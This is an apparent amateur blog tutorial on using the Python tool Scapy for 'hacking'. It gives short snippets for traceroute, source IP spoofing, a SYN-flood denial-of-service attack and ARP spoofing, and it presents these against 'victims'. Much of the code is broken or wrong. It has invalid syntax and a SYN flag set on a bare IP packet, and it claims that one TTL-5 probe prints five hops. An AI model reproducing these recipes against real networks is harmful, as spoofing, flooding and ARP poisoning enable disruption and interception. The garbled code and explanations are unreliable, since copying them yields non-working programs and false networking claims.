scapy for hacking

Scapy is a Python based program. It's using for packet building. Actually you can build the complete IP packet using scapy. It's very useful achieve following hacking techniques.

1. IP spooifng.
2. ARP spoofing.
3. SYN flood.
4. Traceroute.

And more more other things can be done using this tool.
First we will start from Traceroute.

Traceroute.
Traceroute is a tool used in Windows to trace the route to a particular destination address. That's means the intermediate hops situated between the destination and source. In Windows cmd simply type tracert <destination> . Then it will gives you a clear image of what are the intermediate hops. But pathping in cmd gives us comprehensive view of what are the hosts between destination and the source and also the packet loss also between each intermediate host.
This tool can be written using scapy module in python. Actually how the traceroute happens. Every IP packet has a field called ttl(time to live). This field define how many hops the packet can go. If ttl equals to 5, that's mean it can only go through 5 hops.When it received to the nearest host it will reduce the ttl value by one. So let's say we put the ttl value of a packet to 2 and we send it as a ICMP packet...Then the replies came are from the 2nd hop from the source. If we look at the received packet's source address we can determine who are the 2nd hop from the source. So following is the code to achieve these things in Python.

#! /usr/bin/python
from scapy.all import IP,UDP,ICMP
packet = IP(dst = destination add. ttl = 5) / ICMP()
reply = sr(packet)
print reply.src 

This code will print the 5 hosts between the source and the destination.

IP Spoofing.



In this case we are going to change our source IP address. If we've changed the source IP address the victims will not detect our IP from packet sniffing. It will know that the packet came from a different IP. So in scapy we can type like this to achieve this.

scapy
>>>a = IP()
>>>a.src = "desired IP to spoof the victim"
>>>sr1(a)

This is the basic for spoofing source address.

 

 SYN Flood.

Using SYN Flood we can make a DOS attack to a server. Basically when connecting to a server there will happen a three way handshake as follows.
1. --> SYN to server
2. <-- SYN,ACK to client
3. --> ACK to server

In the SYN flood It sends enormous SYN packets to the server that reach to the max possible connections. When it reached to the max possible connections the server will refuse the other connections. So here is the scapy codes.

a = IP()
a.flag = "S"
sr(a)

This will be the basic of SYN Flood.

ARP Spoofing.

ARP Spoofing use to spoof the Router to forward the packets of a certain host to you. You can checkout for what is ARP Spoofing and what are the tools for that in google. Here i will going to ARP spoofing using a python code. This code will reset the ARP table in your network. and the replies for the requests of the certain host will redirected to you. Here is the code for ARP Spoofing.

from scapy.all import IP, Ether,ARP

a = Ether(dst = "ff:ff:ff:ff:ff:ff") ARP(psrc= "your ip address", hwsrc = "your mac address")
sr1(a)

So these things you can done with scapy. Alot more than this. Find out and try them.